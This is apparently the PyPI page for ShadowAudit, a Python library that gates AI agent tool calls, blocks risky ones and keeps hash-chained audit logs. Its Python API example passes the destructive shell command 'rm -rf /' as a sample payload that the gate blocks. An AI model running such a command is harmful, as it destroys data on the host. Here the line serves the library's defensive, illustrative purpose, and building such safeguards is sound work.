Runtime governance for AI agents — deterministic fail-closed enforcement. Wraps any agent tool and blocks dangerous calls before execution. Zero LLM calls, zero cloud dependencies, works offline.
Project description
ShadowAudit
Runtime governance for AI agents — deterministic fail-closed enforcement with auditor-defensible cryptographic audit logs.
ShadowAudit sits between your agent and its tools. It evaluates every call before execution and blocks anything that exceeds your risk threshold. Three things differentiate it from horizontal governance toolkits like Microsoft AGT: (1) auditor-defensible cryptographic audit logs — every decision is hash-chained and optionally Ed25519-signed, producing evidence conformity assessors accept; (2) financial-vertical taxonomy depth — built-in Stripe, Plaid, and fintech-specific risk categories out of the box; (3) air-gap-first deployment — single pip install, zero external calls, works inside isolated VPCs and on-prem.
Agent → ShadowAudit Gate → Tool (allowed)
→ Blocked (AgentActionBlocked raised)
Why ShadowAudit?
| Problem | ShadowAudit's Answer |
|---|---|
| Agents execute arbitrary shell commands | Keyword + regex + AST risk scoring with configurable thresholds |
| No audit trail for agent decisions | Hash-chained, tamper-evident SQLite audit log with SHA-256 linkage and optional Ed25519 signing |
| Can't prove compliance to auditors | Professional HTML reports with SOX/PCI-DSS mappings + EU AI Act Annex IV evidence pack generator |
| Agent behavior drifts over time | Adaptive scoring with behavioral state tracking (K/V metrics) |
| CI/CD deploys unsafe agents | --fail-on-ungated flag blocks deployments |
| Legal team blocks cloud-dependent tools | Works fully offline — zero external calls |
| EU AI Act Annex IV evidence required | Built-in evidence pack generator (JSON + HTML) |
vs Microsoft Agent Governance Toolkit (AGT)
"AGT is the right horizontal governance toolkit. ShadowAudit is the auditor-defensible, financial-vertical, air-gap-ready layer for regulated workloads. Run both — AGT for breadth, ShadowAudit for the audit evidence your conformity assessor will actually accept."
See docs/POSITIONING.md for a detailed, honest comparison.
| Dimension | Microsoft AGT | ShadowAudit |
|---|---|---|
| License | MIT | MIT (OSS SDK) |
| Coverage | All 10 OWASP Agentic risks | 3–5 of 10, focused on tool-call execution |
| Vendor | Microsoft | Independent |
| Audit log | Standard logging | Hash-chained, Ed25519-signed, tamper-evident |
| Vertical taxonomies | Generic | Financial / fintech depth (Stripe, Plaid) |
| Air-gap deployment | Possible but assembly required | First-class — single pip install |
| EU AI Act evidence pack | Compliance module exists | Annex IV evidence-pack generator built-in |
| Solo-buyable for SMBs | No | Yes |
Hosted dashboard and managed cloud tier in development — contact for early access.
Quick Start
pip install shadowaudit
CLI — 3 commands to get started
# 1. Scan your codebase for ungated AI agent tools
shadowaudit check ./src
# 2. Generate a risk assessment with compliance mappings
shadowaudit assess ./src --taxonomy financial --compliance
# 3. Verify your audit log hasn't been tampered with
shadowaudit verify audit.db
# 4. Analyse decisions and get threshold tuning suggestions
shadowaudit tune --audit-log audit.db
For the full CLI reference (all 8 commands with flags and examples), see docs/CLI.md.
Python API — wrap any tool in 5 lines
from shadowaudit import Gate
gate = Gate()
result = gate.evaluate(
agent_id="agent-1",
task_context="shell_tool",
risk_category="execute",
payload={"command": "rm -rf /"},
)
print(result.passed) # False
print(result.risk_score) # 0.11 (varies by payload)
print(result.reason) # "drift_detected"
Framework adapters: LangChain (ShadowAuditTool), CrewAI (ShadowAuditCrewAITool), LangGraph (ShadowAuditToolNode), OpenAI Agents SDK (ShadowAuditOpenAITool), and MCP (MCPGatewayServer + ShadowAuditMCPSession). See examples/ for runnable scripts for each.
See examples/ for runnable scripts covering every framework adapter.
Features
Tamper-Evident Audit
Every gate decision is recorded in an append-only SQLite log. Entries are hash-chained via SHA-256 — modify any row and the chain breaks. Optional Ed25519 signing cryptographically proves authenticity. Verified with shadowaudit verify. See examples/tamper_demo.py for a live demonstration.
Observe Mode & Bypass
Roll out enforcement gradually with Gate(mode="observe"): decisions are logged but never blocked, and result.metadata["would_have_blocked"] tells you what enforce mode would have done. For human-approved overrides, use the bypass() context manager — every bypass is recorded in the audit log with a mandatory reason string.
# Shadow mode — log everything, block nothing
gate = Gate(mode="observe")
result = gate.evaluate(agent_id, task, category, payload)
print(result.metadata["would_have_blocked"]) # True if enforce would have blocked
# Bypass with immutable audit trail
with gate.bypass("agent-1", reason="approved by oncall #4521"):
result = gate.evaluate("agent-1", task, category, payload)
Use shadowaudit tune --audit-log audit.db to analyse block rates per category and get threshold adjustment suggestions.
Multi-Agent Trust Propagation
FlowTracer tracks how data moves between agents and propagates trust downward. If Agent A processes untrusted web content, any payload that flows from A into Agent B's tool call is automatically tagged UNTRUSTED — regardless of B's own trust level.
from shadowaudit import FlowTracer, TrustLevel
tracer = FlowTracer()
tracer.record_output("web-scraper", scraped_data, trust=TrustLevel.UNTRUSTED)
tracer.record_flow("web-scraper", "summariser", parsed_data)
annotation = tracer.annotate(
receiving_agent="payment-agent",
source_agents=["summariser"],
declared_trust=TrustLevel.SYSTEM,
)
print(annotation.effective_trust) # TrustLevel.UNTRUSTED
print(annotation.contaminated_by) # ['web-scraper']
Vertical Taxonomies
Built-in starter packs across 6 domains: general, financial (32 categories — Stripe, Plaid, wire transfers, KYC/AML), financial crypto (18 categories), healthcare (17 categories), legal, and open banking. Each taxonomy defines risk keywords, threshold deltas, severity levels, and compliance mappings. Build custom taxonomies interactively with shadowaudit build-taxonomy.
Framework Coverage
First-class adapters for LangChain, CrewAI, LangGraph, OpenAI Agents SDK, and MCP (gateway + in-process). Drop-in wrappers — same interface, automatic enforcement. Works with any tool that has name, description, and run().
Compliance Reporting
Generate professional HTML reports with executive summaries, risk breakdowns, and remediation plans. Built-in OWASP Agentic Top 10 coverage matrix (shadowaudit owasp) and EU AI Act Annex IV evidence pack generator (shadowaudit eu-ai-act) for regulatory submission. For an honest account of what ShadowAudit catches and misses, see docs/THREAT_MODEL.md.
Offline-First
No cloud. No LLM calls. No API keys. SQLite-backed state and audit log. Single pip install shadowaudit deploys everything needed for runtime governance inside air-gapped VPCs and on-prem environments.
CI/CD Integration
shadowaudit check --fail-on-ungated exits non-zero if high-risk tools are ungated. Drop into any pipeline to block unsafe deploys. Trace simulator replays agent execution logs through the gate for regression testing. A labelled corpus of 130 traces (50 benign / 50 risky / 30 edge cases) in tests/corpus/ lets you validate scoring changes before shipping.
Architecture
┌───────────────────────────────────────────────────────────┐
│ ShadowAudit │
├───────────┬───────────┬───────────┬───────────┬───────────┤
│ CLI │ LangChain │ CrewAI │ Direct │ MCP │
│ (click) │ Adapter │ Adapter │ Gate │ Gateway │
├───────────┴───────────┴───────────┴───────────┴───────────┤
│ Core Gate Engine │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ ┌────────────┐ │
│ │ Scorer │ │ Taxonomy │ │ FSM │ │ Audit Log │ │
│ │ pluggable │ │ Loader │ │ fail-closed│ │Hash-chained│ │
│ └───────────┘ └───────────┘ └───────────┘ │ + Ed25519 │ │
│ ┌───────────┐ ┌───────────┐ └────────────┘ │
│ │ State │ │ Hash │ │
│ │ (SQLite) │ │ (SHA-256) │ │
│ └───────────┘ └───────────┘ │
├───────────────────────────────────────────────────────────┤
│ Assessment & Reporting │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ ┌────────────┐ │
│ │ Scanner │ │ Reporter │ │ Simulator │ │ Builder │ │
│ │ │ │ (Jinja2) │ │ │ │ │ │
│ └───────────┘ └───────────┘ └───────────┘ └────────────┘ │
└───────────────────────────────────────────────────────────┘
How a tool call is evaluated
- Agent calls a tool → intercepted by the framework adapter or direct
Gate.evaluate() - Taxonomy lookup → finds risk category config (keywords, threshold delta, severity)
- Scoring → pluggable scorer computes risk score from payload content
- Threshold comparison → score vs. taxonomy delta determines pass/fail
- Mode / bypass check → observe mode always passes; active
bypass()overrides a block - FSM transition → fail-closed state machine: anything not an explicit pass is a block
- Audit log → decision recorded with timestamp, agent ID, payload hash, and reason
Installation
# Base install — CLI + core gate (click, jinja2)
pip install shadowaudit
# With LangChain adapter
pip install shadowaudit[langchain]
# With CrewAI adapter (Python 3.10–3.12)
pip install shadowaudit[crewai]
# Development
pip install shadowaudit[dev]
Requirements: Python 3.10+
Examples
See the examples/ directory for runnable scripts:
| Example | Description |
|---|---|
local_only.py |
Direct Gate usage — no framework dependencies |
langchain_agent.py |
LangChain agent with ShadowAudit-wrapped tools |
hash_chain_demo.py |
Hash-chained audit log with tamper detection |
tamper_demo.py |
Live tamper-evidence demo: corrupt a row, watch the chain break |
fintech_payment_agent.py |
Production-style payment agent with Gate enforcement and retry logic |
langgraph_demo.py |
LangGraph ShadowAuditToolNode integration |
eu_ai_act_demo.py |
EU AI Act Annex IV evidence pack generation |
Run all examples at once:
python examples/run_all_examples.py
For the full example index (14 scripts covering every v0.4.0 feature), see docs/FEATURES.md.
Testing
Quick smoke test after installing:
shadowaudit --version && \
shadowaudit check . && \
shadowaudit owasp && \
python -c "from shadowaudit.core.gate import Gate; print(Gate().evaluate({'tool':'read'}).passed)"
For the full testing guide, see docs/TESTING_GUIDE.md.
Project Status
ShadowAudit is v0.4.0 — production-ready for audit-time scanning and assessment workflows; runtime gating is in early-adopter use. APIs may evolve before v1.0.0; breaking changes require a major version bump and migration guide.
- ✅ Core gate + 5 framework adapters (LangChain, CrewAI, LangGraph, OpenAI Agents, MCP)
- ✅ Hash-chained, Ed25519-signed audit log with integrity verification
- ✅ Observe mode, bypass context manager, and threshold tuning CLI
- ✅ Multi-agent trust propagation via
FlowTracer - ✅ Vertical taxonomies (general, financial 32-cat, financial_crypto, healthcare, legal, Plaid) + interactive builder
- ✅ Labelled test corpus (130 traces) + scorer benchmark
- ✅ Compliance reporting (OWASP matrix, EU AI Act Annex IV evidence packs)
- ✅ Honest threat model — what ShadowAudit catches and what it doesn't (docs/THREAT_MODEL.md)
- ✅ Offline-first — zero external calls, air-gap ready
Contributing
Bug reports and pull requests are welcome. See CONTRIBUTING.md for development setup, testing, and the PR process.
git clone https://github.com/AnshumanKumar14/shadowaudit-python.git
cd shadowaudit-python
pip install -e ".[dev,langchain]"
pytest tests/ -q
License
MIT — see LICENSE.
Built by Anshuman Kumar
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file shadowaudit-0.5.0.tar.gz.
File metadata
- Download URL: shadowaudit-0.5.0.tar.gz
- Upload date:
- Size: 139.9 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.14.4
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
52e311597e17005973f3dccbc52760a728a2a7fedea4786bac879db7f8031b06
|
|
| MD5 |
141b5ee30f94f0293504e30b1d54e655
|
|
| BLAKE2b-256 |
9951dbe68c9de171079156315e47886d9ea46e6d1a2dcc69a07e69facbc75288
|
File details
Details for the file shadowaudit-0.5.0-py3-none-any.whl.
File metadata
- Download URL: shadowaudit-0.5.0-py3-none-any.whl
- Upload date:
- Size: 99.8 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.14.4
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
a4f0b1669dfc6235486fd1e3dd3f59b56ca297b263750809c5e3d1bcc539520f
|
|
| MD5 |
375d3305a7b0d65fa7526221a7f5240b
|
|
| BLAKE2b-256 |
b9d63b2f8af5873d56966de7d9b8e24abdf69e1f562df73e8333457c6cbb7a89
|